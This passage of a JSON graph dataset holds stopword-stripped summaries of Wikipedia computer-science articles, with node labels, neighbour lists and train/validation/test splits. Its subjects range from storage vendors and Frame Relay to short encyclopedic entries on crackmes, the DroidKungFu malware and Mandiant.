    "text": "Dot_Hill_Systems:dot hill systems dot hill systems corp manufacturer computer storage area network arrays providing computer hardware software products small large computer data storage systems dot hill started 1997 carlsbad california 2004 dot hill acquired chaparral network storage longmont colorado chaparral network storage started 2000 also manufactured storage systems 2010 dot hill start moving almost carlsbad operations longmont dot hill listed nasdaq hill dot hill products interfaces supporting fibre channel fc internet small computer systems interface iscsi serial attached scsi sas products include hard drives solid-state drives ssds dot supports raid software data center storage management applications run windows linux rhel suse apple mac os x snow leopard oracle solaris xenserver vmware esx servers host interfaces ssd sas sata drive technologies seagate technology finalized acquisition company october 2015",
    "neighbors": [
      1801,
      7863,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 1881,
    "label": 4,
    "text": "Crackme:crackme crackme often abbreviated cm small program designed test programmer reverse engineering skills programmed reversers legal way crack software since intellectual property infringed upon crackmes reversemes keygenmes generally similar protection schemes algorithms found proprietary software however due wide use packers/protectors commercial software many crackmes actually difficult algorithm harder find track commercial software keygenme specifically designed reverser find protection algorithm used application also write small keygen programming language choice keygenmes properly manipulated self-keygenning example checking might generate corresponding key simply compare expected entered keys makes easy copy key generation algorithm often anti-debugging anti-disassemble routines used confuse debuggers make disassembly useless code-obfuscation also used make reversing even harder",
    "neighbors": [
      10173,
      8171,
      6797,
      823
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1882,
    "label": 4,
    "text": "2014_Russian_hacker_password_theft:2014 russian hacker password theft 2014 russian hacker password theft alleged hacking incident resulting possible theft 1.2 billion internet credentials including usernames passwords hundreds millions corresponding e-mail addresses data breach first reported new york times reported many media allegedly discovered reported milwaukee-based information security company hold security 420,000 websites reported affected according new york times source big companies know user credentials among stolen hold security disclose sites compromised instead offered two separate services one website owners one consumers check 're affected service website owners costs 10 month check consumers free hold security described group responsible hack small group “ fewer dozen men 20s ... based small city south central russia region flanked kazakhstan mongolia ” dubbed group cybervor russian lit cyber thief hold claimed hack perpetrated use sql injection according forbes article hold security says 1.2 billion credentials stolen way also ones cybervor simply bought people used means hold security n't know split forbes columnist kashmir hill noted internet predictably panicked story yet another massive password breach went viral pretty direct link panic pay-out security firm hold security website service offering people check username password pair stolen requires people send hold security encrypted versions passwords named independent sources come forward confirm breach forbes columnist joseph steinberg even expressed outright skepticism many facts claimed breach raising questions trustworthiness reports breach altogether",
    "neighbors": [
      1024,
      8320,
      899,
      3843,
      5636,
      5764,
      10502,
      2187,
      4240,
      11152,
      10003,
      10132,
      4117,
      8726,
      535,
      1688,
      2717,
      9375,
      1440,
      5024,
      9761,
      4644,
      4133,
      5028,
      11175,
      297,
      2857,
      5547,
      8489,
      11052,
      9518,
      9904,
      7601,
      1970,
      9395,
      8886,
      1337,
      441,
      1979,
      4027,
      10875,
      9664,
      8133,
      1608,
      3657,
      8779,
      3789,
      4304,
      6484,
      4054,
      7639,
      8664,
      857,
      4314,
      7515,
      4956,
      9435,
      4830,
      3807,
      1504,
      4703,
      8288,
      9186,
      8292,
      5349,
      1254,
      10477,
      2542,
      3711,
      3956,
      9460,
      7418,
      507,
      9082,
      2815
    ],
    "mask": "Test"
  },
  {
    "node_id": 1883,
    "label": 9,
    "text": "Alan_Perlis:alan perlis alan jay perlis april 1 1922 – february 7 1990 american computer scientist professor purdue university carnegie mellon university yale university best known pioneering work programming languages first recipient turing award perlis born jewish family pittsburgh pennsylvania graduated taylor allderdice high school 1939 1943 received bachelor degree chemistry carnegie institute technology later renamed carnegie mellon university world war ii served u.s. army became interested mathematics earned master degree 1949 ph.d. 1950 mathematics massachusetts institute technology mit doctoral dissertation titled integral equations solution iteration analytic continuation 1952 participated project whirlwind joined faculty purdue university 1956 moved carnegie institute technology chair mathematics first head computer science department 1962 elected president association computing machinery awarded inaugural turing award 1966 according citation influence area advanced programming techniques compiler construction reference work done member team developed programming language algol 1971 perlis moved yale university become chair computer science hold eugene higgins chair 1977 elected national academy engineering 1982 wrote article epigrams programming association computing machinery acm sigplan journal describing one-sentence distillations many things learned programming career epigrams widely quoted remained yale death 1990 publications selection",
    "neighbors": [
      512,
      7048,
      9993,
      11020,
      1178,
      667,
      8987,
      1952,
      10668,
      2482,
      1976,
      4921,
      9019,
      4799,
      4800,
      10049,
      4930,
      10435,
      70,
      8262,
      3529,
      1610,
      1099,
      9804,
      7630,
      10320,
      2519,
      11099,
      7775,
      9825,
      8695,
      9315,
      4201,
      11242,
      2283,
      4331,
      8813,
      2670,
      2798,
      11625,
      1783,
      505,
      3323,
      511
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1884,
    "label": 9,
    "text": "ActiveJDBC:activejdbc activejdbc java implementation active record design pattern developed igor polevoy inspired activerecord orm ruby rails based convention configuration similar ruby rails activejdbc infers meta data database result models require setters getters creation saving new records table one line updating existing record activejdbc query language search criteria written abbreviated sql activejdbc general purpose java orm served first building block activeweb",
    "neighbors": [
      3080,
      10737,
      9467,
      10413
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1885,
    "label": 4,
    "text": "SyncBack:syncback syncback software allows backing synchronizing files several resources including internal external drive different media usb thumb drive cd dvd remote server nas ftp windows server cloud storage provider governing law shall governed laws singapore file backup move sync restore functions program highly rated easy use features found syncback note features may available higher variants syncback four versions syncback available syncbackfree syncbacklite shareware syncbackse shareware syncbackpro shareware syncbackse syncbackpro work windows client versions windows server oses syncbackfree syncbacklite support windows client versions",
    "neighbors": [
      9025,
      3366,
      1801,
      1358,
      7983,
      4505
    ],
    "mask": "Train"
  },
  {
    "node_id": 1886,
    "label": 4,
    "text": "Mandiant:mandiant mandiant american cybersecurity firm rose prominence february 2013 released report directly implicating china cyber espionage december 30 2013 mandiant acquired fireeye stock cash deal worth excess 1 billion kevin mandia former united states air force officer serves company chief executive officer founded mandiant red cliff consulting 2004 prior rebranding 2006 2011 mandiant received funding kleiner perkins caufield byers expand staff grow business-to-business operations mandiant provides incident response general security consulting along incident management products major global organizations governments fortune 100 companies 2012 revenues 100 million 76 2011 company acquired fireeye december 30 2013 mandiant awarded 2012 2013 sc award exemplary professional leadership information-technology security mandiant creator openioc open indicators compromise extensible xml schema description technical characteristics identify threats attackers methodologies evidence compromise february 18 2013 mandiant released report documenting evidence cyber attacks people liberation army specifically pudong-based pla unit 61398 targeting least 141 organizations united states english-speaking countries extending far back 2006 report mandiant refers espionage unit apt1 report states likely unit 61398 source attacks video uploaded youtube demonstrating one intrusion apt",
    "neighbors": [
      8288,
      9569,
      612,
      2213,
      1254,
      8580,
      176,
      9688,
      5563,
      4956,
      5373,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 1887,
    "label": 9,
    "text": "Rank_(computer_programming):rank computer programming computer programming rank specifications usually synonym refers number dimensions thus two-dimensional array rank two three-dimensional array rank three strictly formal definition provided applies every programming language since concepts semantics terminology term may even applicable contrary applied specific meaning context given language case apl notion applies every operand dyads binary functions left rank right rank box instead shows rank type rank array expression could defined semi-formal style c++ illustrates simple way calculate compile time given code rank type calculated compile time shorter form calculating rank expression done using",
    "neighbors": [
      8262,
      2670
    ],
    "mask": "Test"
  },
  {
    "node_id": 1888,
    "label": 4,
    "text": "FBI_Cyber_Division:fbi cyber division fbi cyber division federal bureau investigation division heads national effort investigate prosecute internet crimes including cyber based terrorism espionage computer intrusions major cyber fraud division fbi uses information gathers investigation inform public current trends cyber crime.federal bureau investigation focuses around three main priorities computer intrusion identity theft cyber fraud created 2002 high priority given investigations involve terrorist organizations intelligence operations sponsored foreign governments fbi calls national security cyber intrusions cyber division primary responsibility fbi efforts counter national security–related cyber intrusions cyber division priorities rank order fbi cyber division works national cyber investigative joint task force ncijtf cyber investigative squads located fbi field office since 2008 ncijtf primary american agency responsible coordinating cyber threats investigations liaisons central intelligence agency cia department defense dod department homeland security dhs national security agency nsa large number cases investigated cyber division come internet fraud complaint center ifcc 2002 received 75,000 complaints cases cyber division investigated included dismantling ring criminals using malware redirect users rogue dns servers operation ghost click taking botnet based coreflood trojan used fraud taking group responsible robbing 2,000 atm machines taking group 100 involved phishing operation phish phry taking darkmarket cyber crime forum used criminals",
    "neighbors": [
      2887,
      7887,
      176,
      4625,
      4689,
      4435,
      4883,
      3544,
      7515
    ],
    "mask": "None"
  },
  {
    "node_id": 1889,
    "label": 9,
    "text": "Concurrent_ML:concurrent ml concurrent ml cml concurrent extension standard ml programming language characterized ability allow programmers create composable communication abstractions first class rather built language design cml primitive operations adopted several programming languages gnu guile racket manticore many programming languages support concurrency offer communication channels allow exchange values processes threads running concurrently system communications established processes may follow specific protocol requiring programmer write functions establish required pattern communication meanwhile communicating system often requires establishing multiple channels multiple servers choosing available channels new data available accomplished using polling select operation unix systems combining application-specific protocols multi-party communication may complicated due need introduce polling checking blocking within pre-existing protocol concurrent ml solves problem reducing coupling programming concepts introducing synchronizable events events first-class abstraction used synchronization operation called codice_1 cml racket order potentially block produce value resulting communication example data transmitted channel cml events combined manipulated using number primitive operations primitive operation constructs new event rather modifying event in-place allows construction compound events represent desired communication pattern example cml allows programmer combine several sub-events order create compound event non-deterministically chooses one sub-events another primitive creates new event modify value resulting synchronization original event events embody patterns communication non-cml language would typically handled using polling loop function handlers kind event sample code print hello world console spawns thread creates channel strings thread spawns another thread prints first string received channel former thread sends hello world\\n string channel uses sml/nj cml note heap name different non linux-x86 platforms may need change line cml_test.x86-linux something different library structure hello",
    "neighbors": [
      5029,
      4423,
      9224,
      2666,
      3733,
      5815,
      2585,
      7386,
      10012
    ],
    "mask": "Test"
  },
  {
    "node_id": 1890,
    "label": 0,
    "text": "Computational_linguistics:computational linguistics computational linguistics interdisciplinary field concerned statistical rule-based modeling natural language computational perspective well study appropriate computational approaches linguistic questions traditionally computational linguistics performed computer scientists specialized application computers processing natural language today computational linguists often work members interdisciplinary teams include regular linguists experts target language computer scientists general computational linguistics draws upon involvement linguists computer scientists experts artificial intelligence mathematicians logicians philosophers cognitive scientists cognitive psychologists psycholinguists anthropologists neuroscientists among others computational linguistics theoretical applied components theoretical computational linguistics focuses issues theoretical linguistics cognitive science applied computational linguistics focuses practical outcome modeling human language use association computational linguistics defines computational linguistics computational linguistics often grouped within field artificial intelligence actually present development artificial intelligence computational linguistics originated efforts united states 1950s use computers automatically translate texts foreign languages particularly russian scientific journals english since computers make arithmetic calculations much faster accurately humans thought short matter time could also begin process language computational quantitative methods also used historically attempted reconstruction earlier forms modern languages subgrouping modern languages language families earlier methods lexicostatistics glottochronology proven premature inaccurate however recent interdisciplinary studies borrow concepts biological studies especially gene mapping proved produce sophisticated analytical tools trustworthy results machine translation also known mechanical translation failed yield accurate translations right away automated processing human languages recognized far complex originally assumed computational linguistics born name new field study devoted developing algorithms software intelligently processing language data term computational linguistics first coined david hays founding member association computational linguistics international committee computational linguistics artificial intelligence came existence 1960s field computational linguistics became sub-division artificial intelligence dealing human-level comprehension production natural languages order translate one language another observed one understand grammar languages including morphology grammar word forms syntax grammar sentence structure order understand syntax one also understand semantics lexicon 'vocabulary even something pragmatics language use thus started effort translate languages evolved entire discipline devoted understanding represent process natural languages using computers nowadays research within scope computational linguistics done computational linguistics departments computational linguistics laboratories computer science departments linguistics departments research field computational linguistics aims create working speech text processing systems others aim create system allowing human-machine interaction programs meant human-machine communication called conversational agents computational linguistics performed experts variety fields wide assortment departments research fields broach diverse range topics following sections discuss literature available across entire field broken four main area discourse developmental linguistics structural linguistics linguistic production linguistic comprehension language cognitive skill develops throughout life individual developmental process examined using number techniques computational approach one human language development provide constraints make harder apply computational method understanding instance language acquisition human children largely exposed positive evidence means linguistic development individual evidence correct form provided evidence correct insufficient information simple hypothesis testing procedure information complex language provides certain boundaries computational approach modeling language development acquisition individual attempts made model developmental process language acquisition children computational angle leading statistical grammars connectionist models work realm also proposed method explain evolution language history using models shown languages learned combination simple input presented incrementally child develops better memory longer attention span simultaneously posed reason long developmental period human children conclusions drawn strength artificial neural network project created ability infants develop language also modeled using robots order test linguistic theories enabled learn children might model created based affordance model mappings actions perceptions effects created linked spoken words crucially robots able acquire functioning word-to-meaning mappings without needing grammatical structure vastly simplifying learning process shedding light information furthers current understanding linguistic development important note information could empirically tested using computational approach understanding linguistic development individual within lifetime continually improved using neural networks learning robotic systems also important keep mind languages change develop time computational approaches understanding phenomenon unearthed interesting information using price equation pólya urn dynamics researchers created system predicts future linguistic evolution also gives insight evolutionary history modern-day languages modeling effort achieved computational linguistics would otherwise impossible clear understanding linguistic development humans well throughout evolutionary time fantastically improved advances computational linguistics ability model modify systems affords science ethical method testing hypotheses would otherwise intractable order create better computational models language understanding language structure crucial end english language meticulously studied using computational approaches better understand language works structural level one important pieces able study linguistic structure availability large linguistic corpora samples grants computational linguists raw data necessary run models gain better understanding underlying structures present vast amount data contained single language one cited english linguistic corpora penn treebank derived widely-different sources ibm computer manuals transcribed telephone conversations corpus contains 4.5 million words american english corpus primarily annotated using part-of-speech tagging syntactic bracketing yielded substantial empirical observations related language structure theoretical approaches structure languages also developed works allow computational linguistics framework within work hypotheses understanding language myriad ways one original theoretical theses internalization grammar structure language proposed two types models models rules patterns learned increase strength frequency encounter work also created question computational linguists answer infant learn specific non-normal grammar chomsky normal form without learning overgeneralized version getting stuck theoretical efforts like set direction research go early lifetime field study crucial growth field structural information languages allows discovery implementation similarity recognition pairs text utterances instance recently proven based structural information present patterns human discourse conceptual recurrence plots used model visualize trends data create reliable measures similarity natural textual utterances technique strong tool probing structure human discourse without computational approach question vastly complex information present discourse data would remained inaccessible scientists information regarding structural data language available english well languages japanese using computational methods japanese sentence corpora analyzed pattern log-normality found relation sentence length though exact cause lognormality remains unknown precisely sort intriguing information computational linguistics designed uncover information could lead important discoveries regarding underlying structure japanese could number effects understanding japanese language computational linguistics allows exciting additions scientific knowledge base happen quickly little room doubt recent days structural data languages available several languages world english language computational linguistics work progress sindhi language structure grammar domain sindhi language different languages world computational linguistics models english language suitable sindhi language viewing computational linguistics work sindhi language started properly developing methods algorithms linguistics tools https //sindhinlp.com/ machine learning models deep learning models since 2016. focus solve linguistics problems sindhi language work could lead important discoveries regarding underlying structure sindhi could number effects understanding sindhi language computational linguistics allows exciting additions scientific knowledge base happen quickly little room doubt without computational approach structure linguistic data much information available would still hidden vastness data within single language computational linguistics allows scientists parse huge amounts data reliably efficiently creating possibility discoveries unlike seen approaches production language equally complex information provides necessary skills fluent producer must say comprehension half problem communication half system produces language computational linguistics made interesting discoveries area famous paper published 1950 alan turing proposed possibility machines might one day ability think thought experiment might define concept thought machines proposed imitation test human subject two text-only conversations one fellow human another machine attempting respond like human turing proposes subject tell difference human machine may concluded machine capable thought today test known turing test remains influential idea area artificial intelligence projects still trying solve problem first started computational linguistics field first place however methods become refined clever consequently results generated computational linguists become enlightening effort improve computer translation several models compared including hidden markov models smoothing techniques specific refinements apply verb translation model found produce natural translations german french words refined alignment model first-order dependence fertility model 16 also provide efficient training algorithms models presented give scientists ability improve results type work specific computational linguistics applications could vastly improve understanding language produced comprehended computers work also done making computers produce language naturalistic manner using linguistic input humans algorithms constructed able modify system style production based factor linguistic input human abstract factors like politeness five main dimensions personality work takes computational approach via parameter estimation models categorize vast array linguistic styles see across individuals simplify computer work way making human-computer interaction much natural many earliest simplest models human-computer interaction eliza example involve text-based input user generate response computer method words typed user trigger computer recognize specific patterns reply accordingly process known keyword spotting recent technologies placed emphasis speech-based interactive systems systems siri ios operating system operate similar pattern-recognizing technique text-based systems former user input conducted speech recognition branch linguistics involves processing user speech sound waves interpreting acoustics language patterns order computer recognize input much focus modern computational linguistics comprehension proliferation internet abundance easily accessible written human language ability create program capable understanding human language would many broad exciting possibilities including improved search engines automated customer service online education early work comprehension included applying bayesian statistics task optical character recognition illustrated bledsoe browing 1959 large dictionary possible letters generated learning example letters probability one learned examples matched new input combined make final decision attempts applying bayesian statistics language analysis included work mosteller wallace 1963 analysis words used federalist papers used attempt determine authorship concluding madison likely authored majority papers 1971 terry winograd developed early natural language processing engine capable interpreting naturally written commands within simple rule governed environment primary language parsing program project called shrdlu capable carrying somewhat natural conversation user giving commands within scope toy environment designed task environment consisted different shaped colored blocks shrdlu capable interpreting commands find block taller one holding put box asking questions n't understand pyramid mean response user input impressive kind natural language processing proven much difficult outside limited scope toy environment similarly project developed nasa called lunar designed provide answers naturally written questions geological analysis lunar rocks returned apollo missions kinds problems referred question answering initial attempts understanding spoken language based work done 1960s 1970s signal modeling unknown signal analyzed look patterns make predictions based history initial somewhat successful approach applying kind signal modeling language achieved use hidden markov models detailed rabiner 1989 approach attempts determine probabilities arbitrary number models could used generating speech well modeling probabilities various words generated possible models similar approaches employed early speech recognition attempts starting late 70s ibm using word/part-of-speech pair probabilities recently kinds statistical approaches applied difficult tasks topic identification using bayesian parameter estimation infer topic probabilities text documents modern computational linguistics often combination studies computer science programming math particularly statistics language structures natural language processing combined fields often lead development systems recognize speech perform task based speech examples include speech recognition software apple siri feature spellcheck tools speech synthesis programs often used demonstrate pronunciation help disabled machine translation programs websites google translate computational linguistics especially helpful situations involving social media internet example filters chatrooms website searches require computational linguistics chat operators often use filters identify certain words phrases deem inappropriate users submit another example using filters websites schools use filters websites certain keywords blocked children view also many programs parents use parental controls put content filters place computational linguists also develop programs group organize content social media mining example twitter programs group tweets subject keywords computational linguistics also used document retrieval clustering online search documents websites retrieved based frequency unique labels related typed search engine instance search red large four-wheeled vehicle intention finding pictures red truck search engine still find information desired matching words four-wheeled car computational linguistics divided major areas depending upon medium language processed whether spoken textual upon task performed whether analyzing language recognition synthesizing language generation speech recognition speech synthesis deal spoken language understood created using computers parsing generation sub-divisions computational linguistics dealing respectively taking language apart putting together machine translation remains sub-division computational linguistics dealing computers translate languages possibility automatic language translation however yet realized remains notoriously hard branch computational linguistics areas research studied computational linguistics include subject computational linguistics recurring impact popular culture",
    "neighbors": [
      2561,
      2562,
      5122,
      3078,
      5639,
      6662,
      9224,
      2059,
      5648,
      2578,
      1044,
      3608,
      538,
      2590,
      5667,
      10794,
      4652,
      7724,
      11308,
      1072,
      4656,
      3635,
      8245,
      11318,
      2103,
      3127,
      3646,
      7230,
      8257,
      8262,
      9798,
      2126,
      10319,
      10320,
      3668,
      11348,
      6745,
      3682,
      7780,
      9327,
      114,
      119,
      5245,
      5248,
      9345,
      6274,
      4744,
      8843,
      5774,
      6798,
      3733,
      10909,
      5278,
      9379,
      3748,
      679,
      2223,
      4271,
      8375,
      7353,
      1214,
      5315,
      9926,
      2247,
      1737,
      9932,
      717,
      2770,
      11474,
      1749,
      11479,
      10456,
      731,
      11487,
      5857,
      4322,
      8421,
      5350,
      4327,
      6374,
      2804,
      2294,
      5373,
      4350,
      5894,
      3335,
      1289,
      1801,
      11529,
      2831,
      5903,
      11538,
      5399,
      10519,
      5404,
      4381,
      2336,
      1828,
      7983,
      6960,
      9522,
      4916,
      3893,
      10557,
      4415,
      9032,
      9546,
      10577,
      8532,
      2901,
      867,
      7013,
      5478,
      874,
      3946,
      8046,
      8562,
      10610,
      8565,
      887,
      384,
      2440,
      401,
      4509,
      10658,
      8099,
      939,
      7597,
      7599,
      4531,
      2488,
      8122,
      4038,
      3533,
      9679,
      5585,
      1490,
      6612,
      9688,
      10716,
      4070,
      8688,
      9200,
      9714,
      7164,
      2558,
      6655
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1891,
    "label": 2,
    "text": "Vinum_volume_manager:vinum volume manager vinum logical volume manager also called software raid allowing implementations raid-0 raid-1 raid-5 models individually combination original vinum part base distribution freebsd operating system since 3.0 also netbsd 2003-10-10 2006-02-25 well descendants freebsd including dragonfly bsd recent versions freebsd replaced gvinum first introduced around freebsd 6 vinum source code maintained freebsd dragonfly source trees vinum supports raid levels 0 1 5 jbod vinum inspired veritas volume manager vinum invoked codice_1 geom vinum freebsd version 5.4 modern freebsd may considered legacy volume manager modern alternatives geom zfs netbsd removed netbsd 4.0 due lack interest maintenance raidframe cited providing similar functionality dragonfly bsd dragonfly hammer filesystem already implements network mirroring codice_2 utility could used configure codice_2 another software raid implementation originally appeared freebsd 6.0 codice_2 deprecated freebsd 9 removed freebsd 10.0 netbsd port red hat lvm2 also available base system dragonfly well addition vinum distribution data across multiple disks managed either dedicated hardware software additionally hybrid raids partly software- partly hardware-based solutions software implementation operating system manages disks array normal drive controller ata sata scsi fibre channel etc. present cpu speeds software raid faster hardware raid hardware implementation raid requires minimum special-purpose raid controller desktop system may pci expansion card might capability built motherboard larger raids controller disks usually housed external multi-bay enclosure controller handles management disks performs parity calculations needed many raid levels option tends provide better performance makes operating system support easier hardware implementations also typically support hot swapping allowing failed drives replaced system running rare cases hardware controllers become faulty result data loss hybrid raids become popular introduction inexpensive hardware raid controllers hardware normal disk controller raid features boot-time application allows users set raids controlled via bios modern operating system used need specialized raid drivers make array look like single block device since controllers actually calculations software hardware often called fakeraids unlike software raid fakeraids typically span multiple controllers simple example mirror drive enterprise drive excelsior raid1",
    "neighbors": [
      10761,
      1049,
      4636,
      9762,
      1071,
      9784,
      5177,
      8266,
      5710,
      7249,
      9306,
      607,
      1637,
      8816,
      9844,
      7802,
      9343,
      2180,
      2193,
      2212,
      684,
      3248,
      1718,
      5819,
      11459,
      9927,
      8395,
      8909,
      6864,
      10455,
      6361,
      8410,
      7907,
      9455,
      1776,
      11506,
      1273,
      7425,
      1801,
      10000,
      274,
      6438,
      8998,
      10535,
      4908,
      7983,
      9009,
      11573,
      850,
      4438,
      6491,
      7521,
      8546,
      6003,
      7027,
      2421,
      2424,
      3450,
      6014,
      1927,
      9625,
      1946,
      11179,
      11698,
      1465,
      3006,
      3013,
      1990,
      1993,
      9677,
      4571,
      3551,
      998,
      4073,
      1515,
      2545,
      3058,
      9201
    ],
    "mask": "Validation"
  },
  {
    "node_id": 1892,
    "label": 4,
    "text": "DroidKungFu:droidkungfu droidkungfu malware affects android os primarily targets users china first evidence malware found android market march 2011 droidkungfu discovered us-based researchers yajin zhou xuxian jiang two discovered malware working north carolina state university targets android 2.2 platform allows hackers access control devices droidkungfu malware collect user data backdoor hacking droidkungfu encrypts two different root exploits udev exploit rageagainsthecage exploit break android security executed decrypts exploits communicates remote server without user knowledge",
    "neighbors": [
      11266,
      2409,
      107,
      2508,
      5261,
      5522,
      4883,
      10297,
      7515,
      4956,
      10141
    ],
    "mask": "Test"
  },
  {
    "node_id": 1893,
    "label": 5,
    "text": "Frame_Relay:frame relay frame relay standardized wide area network technology specifies physical data link layers digital telecommunications channels using packet switching methodology originally designed transport across integrated services digital network isdn infrastructure may used today context many network interfaces network providers commonly implement frame relay voice vofr data encapsulation technique used local area networks lans wide area network wan end-user gets private line leased line frame relay node frame relay network handles transmission frequently changing path transparent end-user extensively used wan protocols less expensive leased lines one reason popularity extreme simplicity configuring user equipment frame relay network offers another reason frame relay popularity advent ethernet fiber optics mpls vpn dedicated broadband services cable modem dsl end may loom frame relay protocol encapsulation however many rural areas remain lacking dsl cable modem services cases least expensive type non-dial-up connection remains 64-kbit/s frame relay line thus retail chain instance may use frame relay connecting rural stores corporate wan designers frame relay aimed provide telecommunication service cost-efficient data transmission intermittent traffic local area networks lans end-points wide area network wan frame relay puts data variable-size units called frames leaves necessary error-correction retransmission data end-points speeds overall data transmission services network provides permanent virtual circuit pvc means customer sees continuous dedicated connection without pay full-time leased line service-provider figures route frame travels destination charge based usage enterprise select level service quality prioritizing frames making others less important frame relay run fractional t-1 full t-carrier system carriers outside americas e1 full e-carrier frame relay complements provides mid-range service basic rate isdn offers bandwidth 128 kbit/s asynchronous transfer mode atm operates somewhat similar fashion frame relay speeds 155.520 mbit/s 622.080 mbit/s frame relay technical base older x.25 packet-switching technology designed transmitting data analog voice lines unlike x.25 whose designers expected analog signals relatively high chance transmission errors frame relay fast packet switching technology operating links low chance transmission errors usually practically lossless like pdh means protocol attempt correct errors frame relay network detects error frame simply drops frame end points responsibility detecting retransmitting dropped frames however digital networks offer incidence error extraordinarily small relative analog networks frame relay often serves connect local area networks lans major backbones well public wide-area networks wans also private network environments leased lines t-1 lines requires dedicated connection transmission period frame relay provide ideal path voice video transmission require steady flow transmissions however certain circumstances voice video transmission use frame relay frame relay originated extension integrated services digital network isdn designers aimed enable packet-switched network transport circuit-switched technology technology become stand-alone cost-effective means creating wan frame relay switches create virtual circuits connect remote lans wan frame relay network exists lan border device usually router carrier switch technology used carrier transport data switches variable may differ among carriers i.e. function practical frame relay implementation need rely solely transportation mechanism sophistication technology requires thorough understanding terms used describe frame relay works without firm understanding frame relay difficult troubleshoot performance frame-relay frame structure essentially mirrors almost exactly defined lap-d. traffic analysis distinguish frame relay format lap-d lack control field frame relay protocol data unit pdu consists following fields frame relay network uses simplified protocol switching node achieves simplicity omitting link-by-link flow-control result offered load largely determined performance frame relay networks offered load high due bursts services temporary overload frame relay nodes causes collapse network throughput therefore frame relay networks require effective mechanisms control congestion congestion control frame relay networks includes following elements network established connection edge node frame relay network must monitor connection traffic flow ensure actual usage network resources exceed specification frame relay defines restrictions user information rate allows network enforce end user information rate discard information subscribed access rate exceeded explicit congestion notification proposed congestion avoidance policy tries keep network operating desired equilibrium point certain quality service qos network met special congestion control bits incorporated address field frame relay fecn becn basic idea avoid data accumulation inside network fecn means forward explicit congestion notification fecn bit set 1 indicate congestion experienced direction frame transmission informs destination congestion occurred becn means backwards explicit congestion notification becn bit set 1 indicate congestion experienced network direction opposite frame transmission informs sender congestion occurred frame relay began stripped-down version x.25 protocol releasing error-correcting burden commonly associated x.25 frame relay detects error simply drops offending packet frame relay uses concept shared access relies technique referred best-effort whereby error-correction practically exist practically guarantee reliable data delivery occurs frame relay provides industry-standard encapsulation utilizing strengths high-speed packet-switched technology able service multiple virtual circuits protocols connected devices two routers although frame relay became popular north america never popular europe x.25 remained primary standard wide availability ip made packet switching almost obsolete used sometimes backbone services x.25 ip traffic frame relay used usa also carrier tcp/ip traffic europe backbones ip networks often used atm pos later replaced carrier ethernet x.25 provides quality service error-free delivery whereas frame relay designed relay data quickly possible low error networks frame relay eliminates number higher-level procedures fields used x.25 frame relay designed use links error-rates far lower available x.25 designed x.25 prepares sends packets frame relay prepares sends frames x.25 packets contain several fields used error checking flow control used frame relay frames frame relay contain expanded link layer address field enables frame relay nodes direct frames destinations minimal processing elimination functions fields x.25 allows frame relay move data quickly leaves room errors larger delays data need retransmitted x.25 packet switched networks typically allocated fixed bandwidth network x.25 access regardless current load resource allocation approach apt applications require guaranteed quality service inefficient applications highly dynamic load characteristics would benefit dynamic resource allocation frame relay networks dynamically allocate bandwidth physical logical channel level wan protocol frame relay commonly implemented layer 2 data link layer open systems interconnection osi seven layer model two types circuits exist permanent virtual circuits pvcs used form logical end-to-end links mapped physical network switched virtual circuits svcs latter analogous circuit-switching concepts public switched telephone network pstn global phone network initial proposals frame relay presented consultative committee international telephone telegraph ccitt 1984 lack interoperability standardization prevented significant frame relay deployment 1990 cisco digital equipment corporation dec northern telecom stratacom formed consortium focus development produced protocol provided additional capabilities complex inter-networking environments frame relay extensions referred local management interface lmi datalink connection identifiers dlcis numbers refer paths frame relay network locally significant means device-a sends data device-b likely use different dlci device-b would use reply multiple virtual circuits active physical end-points performed using subinterfaces lmi global addressing extension gives frame relay data-link connection identifier dlci values global rather local significance dlci values become dte addresses unique frame relay wan global addressing extension adds functionality manageability frame relay internetworks individual network interfaces end nodes attached example identified using standard address-resolution discovery techniques addition entire frame relay network appears typical lan routers periphery lmi virtual circuit status messages provide communication synchronization frame relay dte dce devices messages used periodically report status pvcs prevents data sent black holes pvcs longer exist lmi multicasting extension allows multicast groups assigned multicasting saves bandwidth allowing routing updates address-resolution messages sent specific groups routers extension also transmits reports status multicast groups update messages frame relay connections often given committed information rate cir allowance burstable bandwidth known extended information rate eir provider guarantees connection always support c rate sometimes pra rate adequate bandwidth frames sent excess cir marked discard eligible de means dropped congestion occur within frame relay network frames sent excess eir dropped immediately frame relay aimed make efficient use existing physical resources permitting over-provisioning data services telecommunications companies customers clients unlikely using data service 45 percent time recent years frame relay acquired bad reputation markets excessive bandwidth overbooking telecommunications companies often sell frame relay businesses looking cheaper alternative dedicated lines use different geographic areas depended greatly governmental telecommunication companies policies early companies make frame relay products included stratacom later acquired cisco systems cascade communications later acquired ascend communications lucent technologies june 2007 inc. largest frame relay service provider usa local networks 22 states plus national international networks multiplexing packet data different virtual circuits flows quality service concerns often arise frame one virtual circuit may occupy line long enough period time disrupt service guarantee given another virtual circuit ip fragmentation method addressing incoming long packet broken sequence shorter packets enough information added reassemble long frame far end frf.12 specification frame relay forum specifies perform fragmentation frame relay traffic primarily voice traffic frf.12 specification describes method fragmenting frame relay frames smaller frames",
    "neighbors": [
      8192,
      6403,
      9860,
      9987,
      1030,
      3847,
      9992,
      2701,
      6544,
      1297,
      3218,
      8211,
      10005,
      5270,
      11413,
      6681,
      5402,
      5021,
      3742,
      2206,
      5405,
      8989,
      10271,
      1955,
      10274,
      9381,
      10924,
      562,
      2994,
      2996,
      6834,
      4918,
      7478,
      9909,
      7865,
      3133,
      3006,
      4543,
      4797,
      5437,
      5439,
      7360,
      7364,
      11332,
      2887,
      8265,
      2509,
      4691,
      3156,
      5469,
      5470,
      5472,
      4963,
      10344,
      11112,
      8432,
      5875,
      5749,
      3318,
      5118,
      2431
    ],
    "mask": "None"
  },
  {
    "node_id": 1894,
    "label": 9,
